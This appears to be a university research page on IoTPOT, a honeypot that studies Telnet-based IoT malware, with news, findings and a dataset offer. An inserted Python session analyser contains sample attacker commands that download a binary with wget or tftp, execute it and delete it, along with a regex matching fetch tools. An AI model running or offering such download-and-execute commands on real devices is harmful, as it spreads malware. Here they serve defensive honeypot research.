
Research Results

IoTPOT – Analysing the Rise of IoT Compromises


News

2016/5/27 Our IoTPOT paper was accepted for IPSJ Journal.
2016/4/13 Invited Talk on IoT security at NHK Broadcasting Center.
2016/4/13 Our IoTPOT work is mentioned in the web article on cyber security by NHK.
2016/03/21,23 Our IoTPOT work is reported by Yomiuri Shimbun Newspaper. (Article, 2016/3/21)
2016/03/17 Invited Talk at IEICE General Conference 2016
2016/03/10 Moose Worm targets to infect a large number
2016/03/10 REINCARNA - Increasing Linux.Wifatch infected devices
2016/03/10 Vulnerability allowing arbitrary code execution on routers via 53413/UDP
2016/03/10 Vulnerability leaking DVR configuration files
2016/02/05 Invited Talk at Nikkei BP's Information Security Summit 2016 Spring (in Japanese)
2015/12/21 Invited Talk at Information Security Seminar at Bank of Japan
2015/12/16 Invited Talk at Security Day 2015 (in Japanese)
2015/12/12 Invited Talk at SCHOOL OF INFORMATION SCIENCE SEMINAR 2015 in JAIST (in Japanese)
2015/12/11 Invited Talk at ASEAN-Japan Information Security Workshop for ISPs
2015/12/01 Invited Talk at Nikkei BP's Security Forum (in Japanese)
2015/11/24 Invited Talk at JDC IoT Forum (in Japanese)
2015/09/30 Presented our IoTPOT work at IoT Security Forum 2015 (in Japanese)
2015/06/25 Our IoTPOT paper is accepted for USENIX WOOT 2015!
2015/06/17 Increasing number of IoT devices visiting IoTPOT
2015/06/16 Update of available dataset [Table 1: Malware binaries]
2015/06/16 IoTPOT captures new binaries of ZORRO family!
2015/06/16 IoTPOT captures new binaries of Bashlite family
2015/06/08 IoTPOT captures new malware
2015/06/08 Increasing number of malware captured by IoTPOT
2015/06/08 Variety of IoT devices visit IoTPOT

Contents

  1. Research Description
  2. Available Datasets

Research Description

Please note that the following research description is based on our preliminary results presented at USENIX WOOT 2015. IoTPOT now emulates not only Telnet but also other vulnerable services, including device-specific ones, using distributed proxy sensors in several countries. We have collected many more malware samples and have observed diverse IoT malware behavior, such as click fraud and theft of pay-per-view credentials. For more information, please also check our news articles. If you are interested in our dataset and/or running our proxy sensor, please see the Available Datasets section below.


We analyze the increasing threats against IoT devices. We first analyze Telnet-based scans observed in a darknet, revealing that attacks on Telnet have rocketed since 2014. Moreover, by grabbing the Telnet banners and web contents of the attacking hosts, we confirm that the majority of attacks indeed stem from IoT devices.


Motivated by this, we implement IoTPOT, a novel honeypot that emulates the Telnet services of various IoT devices to analyze ongoing attacks in depth. IoTPOT consists of a frontend low-interaction responder cooperating with backend high-interaction virtual environments called IoTBOX. IoTBOX operates various virtual environments commonly used by embedded systems for different CPU architectures. During 39 days of operation, we observed 76,605 download attempts of malware binaries from 16,934 visiting IP addresses. We also confirm that none of these binaries could have been captured by existing honeypots that handle the Telnet protocol, such as honeyd and telnet password honeypot, because they are not able to handle the different incoming commands sent by the attackers.
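As an added illustration of the frontend/backend split described above (example code, not IoTPOT's own implementation): a minimal analyser that classifies each command in a Telnet session as one the low-interaction frontend can answer itself, a download attempt worth recording, or an unknown command to hand to an IoTBOX-style high-interaction backend. The set of known commands, the download regex and the sample session are assumptions constructed for this example.

```python
import re
from collections import Counter

# Commands the frontend answers itself. Assumed set for this example, modelled
# on the low-interaction responder described above; not IoTPOT's own list.
FRONTEND_KNOWN = {"enable", "sh", "shell", "system", "cat /proc/cpuinfo", "uname -a"}
# A fetch tool followed (within the same command) by a URL or dotted-quad host.
DOWNLOAD_RE = re.compile(
    r"\b(?P<tool>wget|curl|tftp|ftpget)\b[^;|&]*?"
    r"(?P<target>https?://\S+|\b\d{1,3}(?:\.\d{1,3}){3}\b)"
)

def split_commands(line):
    """Split one shell line on ; && || and | into individual commands."""
    return [c.strip() for c in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line) if c.strip()]

def classify(cmd):
    """'known': frontend can answer; 'download': binary fetch attempt worth
    logging; 'forward': unknown command, hand to the high-interaction backend."""
    if cmd in FRONTEND_KNOWN:
        return "known"
    if DOWNLOAD_RE.search(cmd):
        return "download"
    return "forward"

def analyze_session(src_ip, lines):
    """Tally command classes for one session and extract download attempts."""
    counts, downloads = Counter(), []
    for line in lines:
        for cmd in split_commands(line):
            kind = classify(cmd)
            counts[kind] += 1
            if kind == "download":
                m = DOWNLOAD_RE.search(cmd)
                downloads.append({"src": src_ip, "tool": m["tool"], "target": m["target"]})
    return {"counts": dict(counts), "downloads": downloads}

# Constructed sample session (not captured data; 192.0.2.x / 203.0.113.x are
# documentation ranges): enable a shell, probe the CPU, try to fetch two binaries.
SAMPLE_SESSION = [
    "enable",
    "sh",
    "cat /proc/cpuinfo",
    "cd /tmp; wget http://192.0.2.10/bins/mips.bin -O .x; chmod 777 .x; ./.x",
    "tftp -g -r arm.bin 192.0.2.10",
    "rm -rf /tmp/.x",
]

if __name__ == "__main__":
    print(analyze_session("203.0.113.5", SAMPLE_SESSION))
```

Every command tagged "forward" is one a static responder would have answered with an error, which is the gap the backend closes; the "download" records are what a 39-day run aggregates into the download-attempt counts above.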


We manually downloaded 43 distinct malware samples and found that they run on 11 different CPU architectures. Among the 43 collected samples, 39 were new to the VirusTotal database (as of 2015/05/13), revealing a gap in capture tooling for this type of threat. Of the 4 samples that were already in VirusTotal, 2 were not detected by any of VirusTotal's 57 anti-virus engines (as of 2015/05/13).


In order to analyze these captured malware binaries, we implement IoTBOX, the first malware analysis environment for IoT devices. IoTBOX supports 8 CPU architectures, spanning MIPS, ARM, and PPC. Sandbox analysis of 17 samples by IoTBOX revealed that the samples are used to perform 10 different types of DDoS attacks as well as port 23 scans.


Finally, combining the observations of IoTPOT with the sandbox analysis by IoTBOX, we confirm that:

  1. There are at least four distinct malware families spreading via Telnet
  2. Their common behavior is performing DDoS and further propagation over Telnet
  3. Some families evolve quickly, updating frequently and shipping binaries for a variety of CPU architectures, even in the limited observation period of 39 days

Available Datasets

The following datasets are available upon request for interested researchers.

  1. Malware binaries
  2. IoTPOT traffic
  3. Proxy program

Please note that we recently updated IoTPOT, and it now has a proxy sensor that runs in a remote environment. If you run the sensor in your environment, all attack traffic reaching the sensor is redirected to and handled by our honeypot center in Yokohama, Japan. A distributed proxy sensor in your environment gives us additional visibility into attacks on IoT, especially those with locality. In return for running the proxy, you will be able to observe the attack traffic and malware samples captured on your sensor and on some of our own sensors.

If you are interested in our dataset and/or setting up our proxy sensor in your environment, please contact the following email address with a brief description of your research:

E-mail: ips-iotics@ml.ynu.ac.jp


This is a joint work between Yokohama National University, Japan and Saarland University, Germany.

Last Update: 2016/06/27